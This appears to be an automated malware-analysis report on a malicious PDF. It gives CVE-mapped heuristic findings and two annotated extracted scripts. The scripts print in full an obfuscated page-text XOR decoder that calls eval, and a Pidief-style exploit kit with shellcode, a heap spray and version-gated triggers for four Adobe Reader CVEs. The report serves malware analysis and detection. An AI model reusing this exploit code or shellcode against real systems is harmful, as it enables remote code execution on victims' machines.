MALICIOUS
408
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, indicating an attempt to execute arbitrary code. The presence of JavaScript actions and embedded JS streams strongly suggests the document is designed to exploit vulnerabilities or deliver a payload. The ML classifier's output of 0.999985 further supports the malicious nature of the file.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
media.newPlayer — CVE-2009-4324 (critical, CVE exact, rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 (critical, CVE exact, rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 (critical, CVE exact, rule CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher (critical, CVE likely, rule PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit (critical, rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action (low, 1 related finding, rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream (low, rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact (info, rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0017_000.js | pdf-javascript-stream | PDF /JS object 17 at offset 0x21D6 | 2618 bytes |

SHA-256: 6ac4125c255b7b84f9d21c435df751ce54a28fc63bd2e05c80dd288a5bbe307a
Preview script — first 1,000 lines of the extracted script
// Analyst note (report reviewer): stage-1 decoder carved from PDF /JS object 17.
// Every API name is assembled from substr() fragments and numeric arithmetic so that
// plain keyword matching does not see "eval", "unescape" or the page-text APIs:
//   aF = "%", n = "fromCharCode", d = "eval", r = "length", rQ = "substr",
//   cP = "unescape", f = "getPageNumWords", x = "getPageNthWord", iH = 3, rE = 65,
//   p = 2, gV = 0.
// Net effect of the loop at the bottom: for every word on page index 3
// (getPageNumWords(3) / getPageNthWord(3, l); page indices are 0-based in Acrobat's
// JS API), take the word's last two characters as a hex byte via unescape("%" + xx),
// XOR it with 65 (0x41), append the character to eJ, and finally eval(eJ).
// The real payload is therefore carried in the page's visible text, not in this
// stream; the report lists the decoded result as the second extracted artifact
// ("getPageWords-XOR Pidief stage"). The interleaved hex comments are part of the
// original sample and carry no code.
// fd28ff74f52357a76d2acea40101af3b
var aF=String("%7TY".substr(0,1));
// 8d0db0cf97e5a1e488b15449eeaab8a3
var n=new String("from"+"Char"+"CodeNUyT".substr(0,4));
// ea25dbaf0d3c948cc59f33fb134d155d
var h=this;
// 5a290bfd75f7e4bb5839d5e0718c02a3
var t="charC"+"odeAt";
// e7240a36066073e17978ca887ae96a09
var nK=String("cha"+"rCo"+"deA"+"t");
// 9321539bee282029d7a004569d632658
var oZ=String;
// 3c381486bc905aba92c67a105491763c
var d=String("eval7zi".substr(0,4));
// 6899ab40ed64825db102c696eb9d01be;
// f2ac82719b46d54d7ff9097991ce4759
var r="le6NJh".substr(0,2)+"ngTso".substr(0,2)+"vsCthsvC".substr(3,2);
// ff2413d6eae1c7c4093efe9b644c0e0a
var f="get"+"Pag7UT".substr(0,3)+"eNuzxfn".substr(0,3)+"pCrmWoCpr".substr(3,3)+"rds";
// 7a9c8a7c1ebcce1282e33448a3161832
var rE=65;
// 1be33e0b8cb2fcd43bd851aba69136b5
var iH=3;
// 29f550c018464a83475c1823c21b4d4d
var x="geu0o".substr(0,2)+"tP"+"ag"+"jfFeNjFf".substr(3,2)+"th"+"E5gWoEg5".substr(3,2)+"rd";
// c634aa7f0370ff1238c1892546cbad79
var p=66-64;
// 33f88d15273e192864f0ec0f5da4faea
var tO=59-58;
// 7840745b1e3cec49d7db7ad5bd98f025
var cP=String("unesc"+"ape");
// cb451f9cb1d295b73a26f97af8363704
var rQ="su5biN".substr(0,2)+"bskjQ".substr(0,2)+"tr";
// 28f241c9bbed6162c7ed3e6d9f27e5cb
var gV=100-100;
// 8bf1019fd650d622345301fdd8ca1269
// xG(s, i) -> s.charCodeAt(i)
function xG(gX,pU){return gX[t](pU)};
// 48a8704b3c037fae744531f5848c06ec
// eH -> this.unescape
var eH=h[cP];
// a0f057c00cb7706f451235045092a2d7
// Rebinds nK to this.charCodeAt; the result is not used afterwards.
var nK=h[nK];
// e9d1197b54f76ccf4d59f56588192f89
// z(s, i) -> s.substr(i, 2)
function z(v,pU){return v[rQ](pU,p)};
// 8b2b2004c4b88080abb06ced8c9f1b82
// pA(o, k) -> o[k]; used below as pA(String, "fromCharCode")
function pA(v,uP){return v[uP]};
// b38db2f6e39751282581f45d6f1ca9dd
// Unused subtraction helper.
function tQ(kN,rM){return kN-rM};
// 3b7ae776726362c5c6170a1d4ce00111
// mZ(l) -> this.getPageNthWord(3, l)
function mZ(l){return h[x](iH,l)};
// 35070009ae522d04a88c37fd25df0be9
// dI(s) -> s.length - 2
function dI(v){return v[r]-p};
// 1e7da0784c042d77b278fdd402003ff7
// qZ(a, b) -> a + b (string concatenation here)
function qZ(kN,rM){return kN+rM};
// 3c315d93c64995783b4cb48025334ece;
// 350f71a77cf4985855cdec10a1db64bc
// j -> this.eval
var j=h[d];
// bfd5f3b906b9f8bf50ab5eadc37568ee
function xU(iT,nM){return iT^nM;};
// 332a0f79cfb4a27c56be3c4ff369955d
// eJ accumulates the decoded stage-2 source.
var eJ=new oZ();
// ed9141084350c29ad7f1aef7a6538b1d
// nC -> this.getPageNumWords(3): number of words on the carrier page
var nC=h[f](iH);
// 9781e638b759ed9b8d40e26b45a9eceb
// kR(l): word l of page 3 -> unescape("%" + last two chars) -> char code of the result.
// pU, mN and vG are implicit globals.
function kR(l){
// f3eda36df7ebd94f6ffae92d9440bdb3
var nQ=mZ(l);
// eff1db99c6aecfb001d466eaaf18f41a
pU=dI(nQ);
// cc6a057d966e3e55cb1e94ff2fab1f66
mN=z(nQ,pU);
// 82e03bc07fa392c82cada6c7512cf6ee
// The for-loop that drives the decode is fused onto the same line as kR's closing brace.
vG = eH(qZ(aF,mN));return xG(vG,gV);};for(var l=gV;l<nC;l++){
// 0db8baf7da1198dcb8e66cd33deaabbd
var uB=kR(l);
// de310d2d6f82b1a7960d3bded6afbc78
// XOR with 65 (0x41), then append String.fromCharCode(...) to eJ.
var xE=xU(uB,rE);
// 1bb8108b01668767b981049d21733bf5
eJ+=pA(oZ,n)(xE);
// ee14a2687afce05bcde50f8c337c6324
// eval() of the reassembled stage — the "eval/decoder" token the triage rule counts.
}j(eJ);
|
|||
| legacy_pdfkit_stage_000.js | deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3786 bytes |

SHA-256: be80c24dba0c736c107fba47b55dc93de17b9c84bfa2988c4deda791c6e9bed6
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script
���������
// Analyst note: substitution-alphabet pair used to hide the download URL.
// src_table is the plaintext alphabet (URL-safe characters); dest_table is the
// encoded alphabet. get_url() below maps Author-field characters from dest_table
// back to src_table, i.e. this is a simple monoalphabetic substitution, not encryption.
var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%';
var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5=';
// Global array that x8EvTm() fills with the spray blocks referenced by the report's
// PDF_ADOBE_READER_MULTI_CVE_JS_KIT finding.
var hwTl9Dn = new Array();
// Returns the %u-encoded payload string: a fixed blob `s` followed by the URL decoded
// from the document's Author field and re-encoded by for_unescape(). The `name`
// argument is unused. Defender note: the appended URL is the network IOC of this
// sample; it can be recovered from the PDF's /Author entry with the tables above,
// and it is not shown anywhere in this report. How the payload consumes the appended
// URL is not visible here — presumably it is read from memory after the blob.
function get_shellcode(name) {
var u = get_url();
u = for_unescape(u);
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
// Encoded URL is appended directly after the fixed blob.
s+= u;
return unescape(s);
}
// Reads this.info.author (the PDF's /Author metadata) and decodes it with the table pair.
// Note the argument order: encode_str's parameters are (str, src_table, dest_table) but it
// is called here with (dest_table, src_table), so characters are looked up in the encoded
// alphabet and replaced by the plaintext one — the decode direction. Triage tip: the
// document info dictionary of this sample, not the JavaScript, holds the encoded URL.
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
// Character-by-character substitution: each character of `str` that occurs in
// `src_table` is replaced by the character at the same index of `dest_table`;
// characters absent from `src_table` are silently dropped. Symmetric use with the
// two tables swapped (see get_url) reverses the mapping.
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
// Re-encodes a plain string as Acrobat-style "%uXXXX" escapes: hex-encodes it with
// bin2hex(), pads with "00" when the hex digit count is not a multiple of 4, then emits
// each 4-digit group with its two byte pairs swapped (little-endian 16-bit units).
// `g` is assigned without var and so becomes an implicit global.
function for_unescape(str)
{
var out = "";
str = bin2hex(str);
g = Math.round(str.length / 4);
if (g != str.length /4) str+="00";
for(var i=0; i < str.length; i+=4)
{
// Byte order swap: "AABB" -> "%uBBAA".
out+="%u" + str.substr(i+2, 2) + str.substr(i, 2);
}
return out;
}
// Uppercase hex of every UTF-16 code unit of `s`, concatenated. The regex only
// zero-pads single-digit values, so the two-digits-per-character layout that
// for_unescape() relies on holds only for code units <= 0xFF (true for the
// URL alphabet in src_table).
function bin2hex (s){
var i, f = 0, a = [];
s += '';
f = s.length;
for (i = 0; i<f; i++) {
a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();
}
return a.join('');
}
// Grows `PDrScZj4` by repeated self-concatenation until its length * 2 reaches
// `ez5pL6`, then truncates it to ez5pL6 / 2 characters. Used by x8EvTm() to build
// a filler string of a fixed size.
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
// Heap-spray setup (the "heap-sprayed ... exploit paths" the report's
// PDF_ADOBE_READER_MULTI_CVE_JS_KIT finding refers to): fills the global hwTl9Dn
// with x62RaBM3 strings, each a fixed-size filler from Rq4v1qCC() followed by the
// payload from get_shellcode(). `I7T0vko5` selects one of two target constants;
// the dispatcher below passes 1 for the util.printf and media.newPlayer branches and
// 0 for the Collab.* branches. NRjjR6W6 is an implicit global.
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
// Per-Reader-version dispatcher — the PDF_PIDIEF_MULTI_CVE_DISPATCH finding above.
// Each branch corresponds to one of the CVE findings in this report:
//   viewerVersion > 8      -> util.printf with a "%45000f" width   (CVE-2008-2992)
//   viewerVersion < 8      -> Collab.collectEmailInfo               (CVE-2007-5659)
//   viewerVersion < 9.1    -> Collab.getIcon                        (CVE-2009-0927)
//   viewerVersion == 9.2   -> media.newPlayer                       (CVE-2009-4324)
// Note that IyIFVe is a string (toString()), so every comparison relies on implicit
// numeric coercion, and the branches are not mutually exclusive: a version below 8
// satisfies both the "< 8" and "< 9.1" tests. RvU5gmOE is an implicit global and
// `this .collabStore` is a property write on the document object. For detection,
// the tokens app.viewerVersion, util.printf, Collab.collectEmailInfo, Collab.getIcon,
// media.newPlayer and util.printd together are the signals the heuristics above score.
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8)
{
// CVE-2008-2992 branch: oversized format-width argument to util.printf.
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
{
iVvCdy8 += "8";
}
util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
// CVE-2007-5659 branch: large msg argument to Collab.collectEmailInfo.
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
// CVE-2009-0927 branch: long argument to Collab.getIcon, guarded by a feature check.
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
// CVE-2009-4324 branch: media.newPlayer(null) bracketed by util.printd calls;
// the exception from newPlayer is swallowed.
x8EvTm(1);
var sf="1.000000000.000000000.1337 : 3.13.37";
util.printd(sf, new Date());
try {
media.newPlayer(null);
} catch(e) {}
util.printd(sf, new Date());
}
}
// Entry point of the decoded stage: the dispatcher runs as soon as this script is evaluated
// by the stage-1 decoder (eval of the page-text payload).
U2UcYKr();
����������������QQ�NIQQ�NI
|
|||